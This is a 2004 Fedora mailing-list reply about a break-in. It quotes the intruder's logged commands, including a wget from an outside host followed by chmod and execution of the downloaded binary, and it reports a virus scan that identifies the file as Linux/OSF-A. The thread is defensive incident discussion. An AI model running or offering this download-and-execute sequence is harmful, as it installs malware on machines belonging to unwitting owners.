Vulnerability on FC3T2 ? Present in FC3 ?

shrek-m at gmx.de shrek-m at gmx.de
Mon Nov 22 18:28:54 UTC 2004


richard mullens wrote:

> Someone logged into my system on 13 Nov 2004
> I found the following in /var/log/wtmp
>
> 207-36-180-20.prt.primarydns.com
> demo.allegientsystems.com
>
> My user password was changed - but not the root password - and the 
> following commands had been executed:-
>
> w
> uname -a
> cat /etc/issue
> cd /tmp
> wget chebeleu.com/local
> chmod +x local
> ./local -d -r
> ./local -d -r
> lunx
> lynx
>
> There is a similar report dated 10-Nov-2004 at 
> http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631 
>
> where someone suggested it might be the exploit at 
> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>
> Anybody know any more ?


----
$ sweep chebeleu.com/local
 >>> Virus 'Linux/OSF-A' found in file chebeleu.com/local
----

http://www.sophos.com/virusinfo/analyses/linuxosfa.html



$ whois chebeleu.com
[...]

-- 
shrek-m




More information about the fedora-test-list mailing list